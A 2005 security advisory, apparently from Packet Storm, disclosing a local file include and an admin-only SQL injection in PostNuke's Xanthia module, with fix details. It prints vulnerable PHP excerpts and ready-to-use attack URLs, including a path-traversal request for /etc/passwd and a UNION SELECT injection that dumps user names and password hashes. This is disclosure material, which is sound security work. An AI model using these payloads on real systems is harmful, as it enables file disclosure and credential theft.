postnukeSQL0760rc3.txt

2005-08-14T00:00:00
ID PACKETSTORM:39293
Type packetstorm
Reporter Maksymilian Arciemowicz
Modified 2005-08-14T00:00:00

Description

                                        
                                            `  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[PostNuke Non Critical SQL Injection and Include 0.760-RC3=>x cXIb8O3.10]  
  
Author: cXIb8O3(Maksymilian Arciemowicz)  
Date: 2.4.2005  
from securityreason.com TEAM  
  
- --- 0.Description ---  
  
PostNuke: The Phoenix Release (0.760-RC3=>X)  
  
PostNuke is an open source, open developement content management system  
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and  
provides many enhancements and improvements over the PHP-Nuke system. PostNuke  
is still undergoing development but a large number of core functions are now  
stabilising and a complete API for third-party developers is now in place.  
If you would like to help develop this software, please visit our homepage  
at http://noc.postnuke.com/  
You can also visit us on our IRC Server irc.postnuke.com channel  
#postnuke-support  
#postnuke-chat  
#postnuke  
Or at the Community Forums located at:  
http://forums.postnuke.com/  
  
  
- --- 1. Non Critical Local files include ---  
This error exist in modules/Xanthia/pnadminapi.php. You can read all files in server if the PHP is bad configured and if you have admin right.  
  
For exemple:  
  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=cXIb8O3  
etc.  
  
Error message :  
- ---------------  
/www/PostNuke-0.750/source/html/modules/Xanthia/pnadminapi.php on line 1053  
- ---------------  
  
or  
  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=credits&skin=[FILE]  
  
but you can give to varible skin path to other file. Exemple for /etc/passwd  
  
http://[HOST]/[DIR]/source/html/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=../../../../../../../../etc/passwd%00  
  
  
Vulnerability code in modules/Xanthia/pnadminapi.php:  
  
- ---1039-1052---  
$cWhereIsPerso = WHERE_IS_PERSO;  
if (!(empty($cWhereIsPerso))) {  
$xaninitlang_path = $cWhereIsPerso . 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';  
$xaninit_path = $cWhereIsPerso . 'themes/'.$id.'/xaninit.php';  
}  
else {  
$xaninitlang_path = 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';  
$xaninit_path = 'themes/'.$id.'/xaninit.php';  
}  
if (file_exists($xaninitlang_path)) {  
include_once($xaninitlang_path);  
}  
  
include_once($xaninit_path);  
- ---1039-1052---  
etc.  
  
- --- 2. Non critical Sql Injection ---  
This sql injection is non critical because it works only with admin rights.  
  
- -1655-1676---  
$sql="SELECT $column[module] as module,   
$column[block] as block,   
$column[position] as position   
FROM $pntable[theme_blcontrol]  
WHERE $column[position]='$dati[0]'   
ORDER BY $column[module]";  
  
$result =& $dbconn->Execute($sql);  
if(!$result->EOF) {  
// Create output object - this object will store all of our output so that  
// we can return it easily when required  
$pnRender =& new pnRender('Xanthia');  
  
// As Admin output changes often, we do not want caching.  
$pnRender->caching = false;  
  
$pnRender->assign('menu', pnModFunc('Xanthia','admin','thememenu'));   
$pnRender->assign('warn', _XA_NZWARNING);  
$pnRender->assign('columnheaders', array(pnVarPrepForDisplay(_XA_MODULE),  
pnVarPrepForDisplay(_XA_BLOCK)));  
while(!$result->EOF) {  
$row = $result->GetRowAssoc(false);  
- -1655-1676---  
  
So if we want to make successful attack we need first log_in as postnuke administrator.  
When we are administrator we can go to :  
  
Example:  
  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=8&riga[0]='cXIb8O3&riga[1]=and&riga[2]=sp3x&skin=PiterpanV2  
  
Error message :  
- ---------------  
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnadmin.php on line 1676  
- ---------------  
  
Exploit for admin:  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=1&riga[0]='%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass%20FROM%20pn__users%20WHERE%20pn_uid=2/*  
  
- --- 3. How to fix ---  
PNSA 2005-2  
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)  
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html  
SHA1: 6e76d92124c833618d02dfdb87d699374120967d  
MD5: a007e741be11389a986b1d8928a6c0e5  
Size: 160550 Bytes  
  
or CVS  
  
- --- 4. Greets ---  
  
sp3x  
  
- --- 5.Contact ---  
Author: Maksymilian Arciemowicz < cXIb8O3 >  
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com  
GPG-KEY: securityreason.com TEAM  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.6 (FreeBSD)  
  
iD8DBQFCju1CznmvyJCR4zQRAp43AJ4q5/3+dxSvWStOt3r839UGAqZwmQCfUeX9  
FPuUJYFwC8xSOTg8ws0eSWY=  
=pg2k  
-----END PGP SIGNATURE-----  
`